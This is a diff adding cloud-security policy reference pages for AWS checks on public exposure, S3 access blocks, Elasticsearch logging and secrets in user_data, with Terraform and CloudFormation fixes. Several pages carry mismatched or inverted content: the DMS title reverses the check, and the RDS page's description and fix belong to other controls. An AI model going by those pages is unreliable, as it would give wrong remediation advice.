group*, or select an existing one. + +. Select an access policy that contains the appropriate permissions, or create a new policy. ++ +Select * Enable*. + +. The * status* of your domain changes from * Active* to * Processing*. ++ +Prior to log publishing being enabled, the status of your domain must return to * Active*. + + +* CLI Command* + + +Before you can enable log publishing, you need a CloudWatch log group. +If you don't already have one, you will need to can create one. + + +[source,shell] +---- +{ + "aws logs put-resource-policy --policy-name my-policy --policy-document & lt;policy_doc_json>", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_elasticsearch_domain +* *Arguments:* log_publishing_options - (Optional) Options for publishing slow and application logs to CloudWatch Logs. +This block can be declared multiple times, for each log_type, within the same resource. + + +[source,go] +---- +{ + "resource "aws_elasticsearch_domain" "example" { + ... + domain_name = "example" + log_publishing_options { + cloudwatch_log_group_arn = aws_cloudwatch_log_group.example.arn + log_type = "INDEX_SLOW_LOGS" + } + +} +", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Elasticsearch::Domain +* *Arguments:* Properties.LogPublishingOptions.AUDIT_LOGS.Enabled + + +[source,yaml] +---- +{ + "Resources: + Resource0: + Type: 'AWS::Elasticsearch::Domain' + Properties: + ... + LogPublishingOptions: + AUDIT_LOGS: ++ Enabled: True + ... +", + +} +---- diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elastisearch-policies.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elastisearch-policies.adoc new file mode 100644 index 000000000..59f2027f7 --- /dev/null +++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elastisearch-policies.adoc @@ -0,0 +1,29 @@ +== Elasticsearch Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:elasticsearch-3-enable-encryptionatrest.adoc[AWS Elasticsearch domain Encryption for data at rest is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py[CKV_AWS_5] +|LOW + + +|xref:elasticsearch-5.adoc[AWS Elasticsearch does not have node-to-node encryption enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py[CKV_AWS_6] +|MEDIUM + + +|xref:elasticsearch-6.adoc[AWS Elasticsearch domain is not configured with HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py[CKV_AWS_83] +|MEDIUM + + +|xref:elasticsearch-7.adoc[AWS Elasticsearch domain logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py[CKV_AWS_84] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public.adoc b/code-security/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public.adoc new file mode 100644 index 000000000..57f6ae566 --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public.adoc @@ -0,0 +1,86 @@ +== AWS Private ECR repository policy is overly permissive + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9f40d30b-97fd-4ec5-827b-f74b50a312b9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRPolicy.py[CKV_AWS_32] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS ECR is a managed Docker registry service that simplifies Docker container image management. +The ECR repository is a collection of Docker images available on AWS. +Access control to ECR repositories is governed using resource-based policies. +A public ECR repository can expose internal Docker images that contain confidential business logic. +We recommend you do not allow unrestricted public access to ECR repositories to help avoid data leakage. + +=== Fix - Runtime + + +*AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/ecs/[Amazon ECS console]. + +. Select *Amazon ECR **, then select **Repositories*. + +. Click the image repository that you want to configure. ++ +To modify the permission policy, select *Permissions*. + +. In the *Permission statements*, select the _policy statement_ that has *Effect **set to **Allow* and *Principal* set to *****. + +. To select a restricted access policy, click *Edit* and make changes. + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::ECR::Repository +* *Argument:* Properties.RepositoryPolicyText.Statement.Principal + + +[source,yaml] +---- +Resources: + MyRepository: + Type: AWS::ECR::Repository + Properties: + ... + RepositoryPolicyText: + ... + Statement: + - ... +- Principal: "*" ++ Principal: ++ AWS: ++ - "arn:aws:iam::123456789012:user/Bob" ++ - ... +---- diff --git a/code-security/policy-reference/aws-policies/public-policies/public-11.adoc b/code-security/policy-reference/aws-policies/public-policies/public-11.adoc new file mode 100644 index 000000000..d7c71a9d9 --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-11.adoc @@ -0,0 +1,92 @@ +== AWS MQ is publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| be6e507b-b1e5-4043-a8d7-94df078f81e6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py[CKV_AWS_69] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Brokers created without public accessibility cannot be accessed from outside of your VPC. +This greatly reduces your broker's susceptibility to DDoS attacks from the internet. +Public Amazon MQ brokers can be accessed directly, outside of a VPC, allowing every EC2 on the Internet to reach your brokers through their public endpoints. +This can increase the opportunity for malicious activity such as cross-site scripting and clickjacking attacks. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/amazon-mq/ [Amazon MQ console]. + +. In the * Select deployment and storage* page, in the * Deployment mode and storage type* section configure your MQ based on your specs. + +. In the * Network and security * section, configure your broker's connectivity and select the * Public accessibility* of your broker. ++ +Disabling public accessibility makes the broker accessible only within your VPC. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_mq_broker +* *Arguments:* publicly_accessible - (Optional) Whether to enable connections from applications outside of the VPC that hosts the broker's subnets. + + +[source,go] +---- +{ + "resource "aws_mq_broker" "example" { + broker_name = "example" ++ publicly_accessible = true + configuration { + id = aws_mq_configuration.test.id + revision = aws_mq_configuration.test.latest_revision + } + + + engine_type = "ActiveMQ" + engine_version = "5.15.0" + host_instance_type = "mq.t2.micro" + security_groups = [aws_security_group.test.id] + + user { + username = "ExampleUser" + password = "MindTheGap" + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/public-policies/public-12.adoc b/code-security/policy-reference/aws-policies/public-policies/public-12.adoc new file mode 100644 index 000000000..2f91290a5 --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-12.adoc @@ -0,0 +1,110 @@ +== AWS EC2 instances with public IP and associated with security groups have Internet access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2c2fb17b-b4bf-4fdd-bada-e7c510e2649e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2PublicIP.py[CKV_AWS_88] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +A public IP address is an IPv4 address that is reachable from the Internet. +You can use public addresses for communication between your instances and the Internet. +Each instance that receives a public IP address is also given an external DNS hostname. +We recommend you control whether your instance receives a public IP address as required. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/vpc [Amazon VPC console]. + +. In the navigation pane, select * Subnets*. + +. Select a * subnet*, then select * Subnet Actions* > * Modify auto-assign IP settings*. + +. Select * auto-assign public IPv4 address*. ++ +When selected, requests a public IPv4 address for all instances launched into the selected subnet. ++ +Select or clear the setting as required. + +. Click * Save*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_instance +* *Arguments:* associate_public_ip_address - (Optional) Associate a public ip address with an instance in a VPC. + +Boolean value. + + +[source,go] +---- +resource "aws_instance" "bar" { + ... +- associate_public_ip_address = true +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::EC2::Instance / AWS::EC2::LaunchTemplate +* *Arguments:* NetworkInterfaces.AssociatePublicIpAddress - (Optional) Associate a public ip address with an instance in a VPC. +Boolean value. + + +[source,yaml] +---- +Resources: + EC2Instance: + Type: AWS::EC2::Instance + Properties: + ... + NetworkInterfaces: + - ... +- AssociatePublicIpAddress: true + + EC2LaunchTemplate: + Type: AWS::EC2::LaunchTemplate + Properties: + LaunchTemplateData: + ... + NetworkInterfaces: + - ... +- AssociatePublicIpAddress: true +---- diff --git a/code-security/policy-reference/aws-policies/public-policies/public-13.adoc b/code-security/policy-reference/aws-policies/public-policies/public-13.adoc new file mode 100644 index 000000000..0f4124372 --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-13.adoc @@ -0,0 +1,77 @@ +== DMS replication instance should be publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a1497898-ea75-4d3b-b806-b9cae5442771 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py[CKV_AWS_89] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS Database Migration Service (AWS DMS) is a service for migrating relational databases, data warehouses, NoSQL databases and other data stores. +DMS can be used to migrate data into the AWS Cloud, between on-premises instances, or between combinations of cloud and on-premises environments. +An AWS DMS replication instance can have one public IP address and one private IP address, just like an Amazon Elastic Compute Cloud (Amazon EC2) instance that has a public IP address. +If you uncheck (disable) the box for Publicly accessible, then the replication instance has only a private IP address. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_dms_replication_instance +* *Arguments:* publicly_accessible - (Optional, Default: false) Specifies the accessibility options for the replication instance. + +A value of true represents an instance with a public IP address. +A value of false represents an instance with a private IP address. + + +[source,go] +---- +resource "aws_dms_replication_instance" "test" { + ... + allocated_storage = 20 ++ publicly_accessible = false +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::DMS::ReplicationInstance +* *Arguments:* Properties.PubliclyAccessible - (Optional, Default: false) Specifies the accessibility options for the replication instance. + +A value of true represents an instance with a public IP address. +A value of false represents an instance with a private IP address. + + +[source,yaml] +---- +Resources: + ReplicationInstance: + Type: AWS::DMS::ReplicationInstance + Properties: + ... ++ PubliclyAccessible: False +---- diff --git a/code-security/policy-reference/aws-policies/public-policies/public-2.adoc b/code-security/policy-reference/aws-policies/public-policies/public-2.adoc new file mode 100644 index 000000000..a083951ce --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-2.adoc @@ -0,0 +1,101 @@ +== AWS RDS database instance is publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1bb6005a-dca6-40e2-b0a6-24da968c0808 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py[CKV_AWS_17] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Ensure that all your public AWS Application Load Balancer are integrated with the Web Application Firewall (AWS WAF) service to protect against application-layer attacks. +An Application Load Balancer functions at the application layer, the seventh layer of the Open Systems Interconnection (OSI) model. +After the load balancer receives a request, it evaluates the listener rules in priority order to determine which rule to apply, and then selects a target from the target group for the rule action. +You can configure listener rules to route requests to different target groups based on the content of the application traffic. +Routing is performed independently for each target group, even when a target is registered with multiple target groups. + +=== Fix - Runtime + + +*AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/rds[Amazon RDS console]. + +. On the navigation pane, click *Snapshots*. + +. Select the _snapshot_ to encrypt. + +. Navigate to *Snapshot Actions*, select *Copy Snapshot*. + +. Select your *Destination Region*, then enter your *New DB Snapshot Identifier*. + +. Set *Enable Encryption* to *Yes*. + +. Select your *Master Key* from the list, then select *Copy Snapshot*. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_db_instance +* *Arguments:* publicly_accessible + + +[source,go] +---- +{ + "resource "aws_db_instance" "default" { + ... ++ publicly_accessible = false +}", + + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::RDS::DBInstance +* *Arguments:* Properties.PubliclyAccessible + + +[source,yaml] +---- +{ + "Type: 'AWS::RDS::DBInstance' + Properties: + ... ++ PubliclyAccessible: false", + +} +---- diff --git a/code-security/policy-reference/aws-policies/public-policies/public-6-api-gateway-authorizer-set.adoc b/code-security/policy-reference/aws-policies/public-policies/public-6-api-gateway-authorizer-set.adoc new file mode 100644 index 000000000..f8647d6c8 --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-6-api-gateway-authorizer-set.adoc @@ -0,0 +1,93 @@ +== AWS API gateway methods are publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7cc87c0f-aeb7-4397-9ee7-c90eaf24e770 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py[CKV_AWS_59] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS API gateway methods are by default publicly accessible. +All of the methods configured as part of the API should be protected by an Authorizer or an API key. +Unprotected API's can lead to data leaks and security breaches. +We recommend you configure a custom authorizer OR an API key for every method in the API Gateway. + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::ApiGateway::Method +* *Arguments:* Properties.HttpMethod / Properties.AuthorizationType / Properties.ApiKeyRequired + + +[source,yaml] +---- +Resources: + ProtectedExample1: + Type: 'AWS::ApiGateway::Method' + Properties: + ... ++ HttpMethod: OPTIONS + AuthorizationType: NONE + ... + + ProtectedExample2: + Type: 'AWS::ApiGateway::Method' + Properties: + ... + HttpMethod: GET + AuthorizationType: NONE ++ ApiKeyRequired: true + ... + + ProtectedExample3: + Type: 'AWS::ApiGateway::Method' + Properties: + ... + HttpMethod: GET ++ AuthorizationType: AWS_IAM # or other valid authorization types + ... +---- + + +*Terraform* + + +* *Resource:* aws_api_gateway_method +* *Arguments:* http_method, authorisation, api_key_required + + +[source,go] +---- +resource "aws_api_gateway_method" "pass" { + rest_api_id = aws_api_gateway_rest_api.MyDemoAPI.id + resource_id = aws_api_gateway_resource.MyDemoResource.id + + http_method = "OPTIONS" + + authorization = "NONE" + + api_key_required = true + tags = { test = "Fail" } +} +---- diff --git a/code-security/policy-reference/aws-policies/public-policies/public-9.adoc b/code-security/policy-reference/aws-policies/public-policies/public-9.adoc new file mode 100644 index 000000000..3f0acae4c --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-9.adoc @@ -0,0 +1,92 @@ +== AWS Redshift clusters should not be publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f7e5da40-e30e-43d2-81d3-a5f59aa38b21 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py[CKV_AWS_87] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Redshift clusters deployed within a VPC can be accessed from: the Internet, EC2 Instances outside the VPC via VPN, bastion hosts that you can launch in your public subnet, and using Amazon Redshift's Publicly Accessible option. +To use public connectivity, create your Redshift clusters with the *Publicly Accessible* option set to *Yes*, your Redshift clusters within a VPC will be fully accessible outside your VPC. +If you do not want your Redshift clusters accessible from the Internet or outside your VPC, disable the Redshift *Publicly Accessible* option. +If your AWS account allows you to create EC2-Classic clusters, the default option for *Publicly Accessible* is *No*. +Public access to a Redshift cluster can increase the opportunity for malicious activity such as SQL injections or Distributed Denial of Service (DDoS) attacks. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Navigate to the * Redshift* service. + +. Click on the identified Redshift cluster name. + +. In the menu options, click * Cluster*, then select * Modify*. + +. Ensure the value for * Publicly Accessible* is set to * No*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_cluster +* *Arguments:* publicly_accessible + + +[source,go] +---- +resource "aws_redshift_cluster" "default" { + cluster_identifier = "tf-redshift-cluster" + ... +- publicly_accessible= "true" ++ publicly_accessible= "false" +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Redshift::Cluster +* *Arguments:* Properties.PubliclyAccessible + + +[source,yaml] +---- +Type: "AWS::Redshift::Cluster" + Properties: + ... +- PubliclyAccessible: true ++ PubliclyAccessible: false +---- diff --git a/code-security/policy-reference/aws-policies/public-policies/public-policies.adoc b/code-security/policy-reference/aws-policies/public-policies/public-policies.adoc new file mode 100644 index 000000000..bdc5de89d --- /dev/null +++ b/code-security/policy-reference/aws-policies/public-policies/public-policies.adoc @@ -0,0 +1,44 @@ +== Public Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:public-1-ecr-repositories-not-public.adoc[AWS Private ECR repository policy is overly permissive] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRPolicy.py[CKV_AWS_32] +|HIGH + + +|xref:public-11.adoc[AWS MQ is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py[CKV_AWS_69] +|MEDIUM + + +|xref:public-12.adoc[AWS EC2 instances with public IP and associated with security groups have Internet access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2PublicIP.py[CKV_AWS_88] +|HIGH + + +|xref:public-13.adoc[DMS replication instance should be publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py[CKV_AWS_89] +|HIGH + + +|xref:public-2.adoc[AWS RDS database instance is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py[CKV_AWS_17] +|MEDIUM + + +|xref:public-6-api-gateway-authorizer-set.adoc[AWS API gateway methods are publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py[CKV_AWS_59] +|LOW + + +|xref:public-9.adoc[AWS Redshift clusters should not be publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py[CKV_AWS_87] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-19.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-19.adoc new file mode 100644 index 000000000..3290c9220 --- /dev/null +++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-19.adoc @@ -0,0 +1,58 @@ +== AWS S3 Buckets has block public access setting disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 39bced69-0875-4e10-a8e6-bffb1c5b3319 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py[CKV_AWS_53] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon S3 buckets and objects are configured to be private. +They are protected by default, with the option to use Access Control Lists (ACLs) and bucket policies to grant access to other AWS accounts and to anonymous public requests. +The *Block public access to buckets and objects granted through new access control lists (ACLs)* option does not allow the use of new public bucket or object ACLs, ensuring future PUT requests that include them will fail. +This setting helps protect against future attempts to use ACLs to make buckets or objects public. +When an application tries to upload an object with a public ACL this setting will be blocked for public access. +We recommend you set S3 Bucket BlockPublicAcls to *True*. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_bucket_public_access_block Argument: block_public_acls + + +[source,text] +---- +resource "aws_s3_bucket_public_access_block" "artifacts" { + count = var.bucketname == "" ? 1 : 0 + bucket = aws_s3_bucket.artifacts[0].id + ++ block_public_acls = true + block_public_policy = true + restrict_public_buckets = true + ignore_public_acls=true +} +---- diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-20.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-20.adoc new file mode 100644 index 000000000..37e984166 --- /dev/null +++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-20.adoc @@ -0,0 +1,58 @@ +== AWS S3 Bucket BlockPublicPolicy is not set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 93d2336f-0c9c-448e-b18e-bc7122cbf8a0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py[CKV_AWS_54] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon S3 Block Public Access policy works at the account level and on individual buckets, including those created in the future. +It provides the ability to block existing public access, whether specified by an ACL or a policy, and ensures public access is not granted to newly created items. +If an AWS account is used to host a data lake or another business application, blocking public access will serve as an account-level guard against accidental public exposure. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_bucket_public_access_block Argument: block_public_policy + + +[source,text] +---- +{ + "resource "aws_s3_bucket_public_access_block" "artifacts" { + count = var.bucketname == "" ? 1 : 0 + bucket = aws_s3_bucket.artifacts[0].id + + block_public_acls = true ++ block_public_policy = true + restrict_public_buckets = true + ignore_public_acls=true +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-21.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-21.adoc new file mode 100644 index 000000000..e0f583693 --- /dev/null +++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-21.adoc @@ -0,0 +1,71 @@ +== AWS S3 bucket IgnorePublicAcls is not set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 28a820e2-f227-45aa-a80c-1873efb2d0b1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py[CKV_AWS_55] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +The IgnorePublicAcls setting causes S3 to ignore all public ACLs on a bucket and any objects that it contains. +Enabling this setting does not affect the persistence of any existing ACLs and does not prevent new public ACLs from being set. +This setting will block public access granted by ACLs while still allowing PUT Object calls that include a public ACL. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_bucket_public_access_block +* *Arguments:* ignore_public_acls + + +[source,go] +---- +resource "aws_s3_bucket_public_access_block" "artifacts" { + ... + restrict_public_buckets = true ++ ignore_public_acls=true +} +---- + + + +*CloudFormation* + + +* *Resource:* AWS::S3::Bucket +* *Arguments:* Properties.PublicAccessBlockConfiguration.IgnorePublicAcls + + +[source,yaml] +---- +Type: 'AWS::S3::Bucket' + Properties: + ... + PublicAccessBlockConfiguration: + ... ++ IgnorePublicAcls: true +---- diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-22.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-22.adoc new file mode 100644 index 000000000..e4bca6afb --- /dev/null +++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-22.adoc @@ -0,0 +1,77 @@ +== AWS S3 bucket RestrictPublicBucket is not set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ed4af42c-c3fc-4857-aca8-3b254a141465 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py[CKV_AWS_56] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +The S3 Block Public Access configuration enables specifying whether S3 should restrict public bucket policies for buckets in this account. +Setting RestrictPublicBucket to TRUE restricts access to buckets with public policies to only AWS services and authorized users within this account. +Enabling this setting does not affect previously stored bucket policies. +Public and cross-account access within any public bucket policy, including non-public delegation to specific accounts, is blocked. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_bucket_public_access_block +* *Arguments:* restrict_public_buckets + + +[source,go] +---- +{ + "resource "aws_s3_bucket_public_access_block" "artifacts" { + ... ++ restrict_public_buckets = true +}", + + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::S3::Bucket +* *Arguments:* Properties.PublicAccessBlockConfiguration.RestrictPublicBuckets + + +[source,yaml] +---- +{ + "Type: 'AWS::S3::Bucket' + Properties: + ... + PublicAccessBlockConfiguration: + ... ++ RestrictPublicBuckets: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-23.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-23.adoc new file mode 100644 index 000000000..0e1a8352c --- /dev/null +++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-23.adoc @@ -0,0 +1,131 @@ +== AWS S3 bucket policy overly permissive to any principal + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8827bbb9-bf4b-4d39-a21d-dcf62037244d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py[CKV_AWS_70] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*AWS S3 bucket policy overly permissive to any principal* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8827bbb9-bf4b-4d39-a21d-dcf62037244d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py[CKV_AWS_70] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +The Principal element specifies the user, account, service, or other entity that is allowed or denied access to a resource. +In Amazon S3, a Principal is the account or user who is allowed access to the actions and resources in the statement. +When added to a bucket policy, the principal is the user, account, service, or other entity that is the recipient of this permission. +When you set the wildcard ("_") as the Principal value you essentially grant permission to everyone. +This is referred to as anonymous access. +The following statements are all considered Anonymous Permissions. + +[source,shell] +---- +## Example 1 +"Principal":"*" + +## Example 2 +"Principal":{"AWS":"*"} + +## Example 2 +"Principal":{"AWS":["*", ...]} +---- + + +When you grant anonymous access, anyone in the world can access your bucket. +It is highly recommend to *never* grant any kind of anonymous write access to your S3 bucket. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/s3/ [Amazon S3 console]. + +. Select the * Permissions* tab, then select * Bucket Policy*. + +. Remove policies for s3:List* actions for principals '*'. ++ +If necessary, modify the policy instead, to limit the access to specific principals. +//// + +=== Fix - Buildtime + + +*Terraform* + + + +[source,go] +---- +resource "aws_s3_bucket" "bucket" { + bucket = "bucket" + + policy = < +--instance-id & lt;INSTANCE_ID> +--query UserData.Value +--output text > encodeddata; base64 +--decode encodeddata +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_instance +* *Argument:* user_data In this case, the analysis has found a likely AWS secret being used in your user_data. + +Remove these secrets, substitute with dynamic (i.e. +Obtain from Vault) or use instance profiles. + + +[source,go] +---- +resource "aws_instance" "web" { + ... + instance_type = "t3.micro" +- user_data = "access_key=123456ABCDEFGHIJZTLA and secret_key=AAAaa+Aa4AAaAA6aAkA0Ad+Aa8aA1aaaAAAaAaA" +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::EC2::Instance +* *Argument:* Properties.UserData + + +[source,yaml] +---- +Resources: + Instance: + Type: AWS::EC2::Instance + Properties: + ... +- UserData: "..." +---- diff --git a/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-3.adoc b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-3.adoc new file mode 100644 index 000000000..3eca5bd16 --- /dev/null +++ b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-3.adoc @@ -0,0 +1,102 @@ +== Lambda function's environment variables expose secrets + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 437d3791-e184-445c-8487-615267f8af83 + +|Checkov Check ID +| 